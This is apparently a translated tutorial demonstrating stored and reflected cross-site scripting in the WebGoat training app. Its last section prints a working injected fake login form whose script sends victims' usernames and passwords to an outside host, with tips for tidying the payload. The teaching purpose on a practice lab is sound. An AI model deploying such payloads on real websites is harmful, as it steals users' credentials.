Li Bai's Cross Site Scripting (XSS) attack

Source: Internet
Author: User

What is an XSS attack? The definition found online is as follows:
XSS (Cross Site Scripting), sometimes also written CSS (Cross Site Script), is a cross-site scripting attack. A malicious attacker inserts malicious script code into a web page; when a user browses this page, the script embedded in the page is executed, which achieves the attacker's purpose against that user. XSS is a passive attack, and because it is passive and harder to exploit, many people tend to ignore its dangers.
Cross-site scripting (XSS) is one of the most common vulnerabilities in web applications.
The following demonstrates each XSS category in turn using the WebGoat project.
3.1 Stored XSS
Stored cross-site scripting is the more harmful type of XSS: the script is saved to the database, so the payload remains on the page for a long time.
In the first step, we log on with the tom account and use it to carry out the XSS attack; when jerry later visits tom's page, jerry is compromised.
Log on with the tom account, select tom, click "viewprofile", and then click "editprofile".
The following page is displayed:

Enter <script>alert('OK')</script> in any text box and click "updateprofile".
The script executes immediately and the alert box pops up. Now log out, log on with the jerry account, select the tom user, and click "viewprofile".
This page shows that the attack succeeded.
Next, let's look at the reflected XSS attack.
3.2 Reflected XSS attack
This is the most common and best-known form of XSS. When the web client submits data, the server immediately generates a result page for that client. If the result page includes the client's input without validation, client script can be injected directly into the dynamic page. The classic example is a site search: when we search for a string containing special HTML characters, the result page usually echoes the string back to tell us what we searched for, and if that string is not encoded, an XSS vulnerability exists.
After logging on as larry, click "searchstaff", paste the <script>alert('OK')</script> code, and click "findprofile"; the script executes and the alert box pops up.
So far we have only shown that the so-called XSS attack can be placed on the website; in fact, what we have shown is that the XSS vulnerability exists. An attacker can use this vulnerability to do many things. Next we take one of the many dangers as a demonstration.
3.3 Stealing the password with a fake login box in stored XSS

This is a comment form with two text boxes, a title and a content field. Enter 1 as the title and paste the following code into the content field:

<script>
function hack() {
  // Build an image URL that carries the values typed into the fake login form
  XSSImage = new Image;
  XSSImage.src = "http://photo.163.com/?PROPERTY=yes&user=" + document.forms[1].user.value + "&password=" + document.forms[1].pass.value + "";
  alert(XSSImage.src);
}
</script>

<form><br><hr><h3>This feature requires account login:</h3><br>Enter Username:<br><input type="text" id="user" name="user"><br>Enter Password:<br><input type="password" name="pass"><br><input type="submit" name="login" value="login" onclick="hack()"></form><br><hr>

Click "submit". The following figure is displayed:
A comment with the title "1" appears in the message list. Click this comment:
A login box appears, as if this website required login to view comments; but once you log in, your account and password are automatically sent to the attacker. Let's explain this code:

<form><br><hr><h3>This feature requires account login:</h3><br>Enter Username:<br><input type="text" id="user" name="user"><br>Enter Password:<br><input type="password" name="pass"><br><input type="submit" name="login" value="login" onclick="hack()"></form><br><hr>
This code creates two text boxes, a username box with id="user" and a password box, followed by a submit button. The button's onclick event calls hack(), and the content of the hack() method is as follows:

<script>
function hack() {
  // Build an image URL that carries the values typed into the fake login form
  XSSImage = new Image;
  XSSImage.src = "http://photo.163.com/?PROPERTY=yes&user=" + document.forms[1].user.value + "&password=" + document.forms[1].pass.value + "";
  alert(XSSImage.src);
}
</script>

This code works as follows: first an Image object is created; XSSImage.src sets (or returns) the image URL, and here the URL is built from the leaked account and password, so assigning it makes the browser request that URL; alert(XSSImage.src) only verifies that we have obtained the account and password, and it can be removed because it is useless to the attack. After an account and password are submitted, for example:
this shows that the account and password have been obtained and the attack is complete.
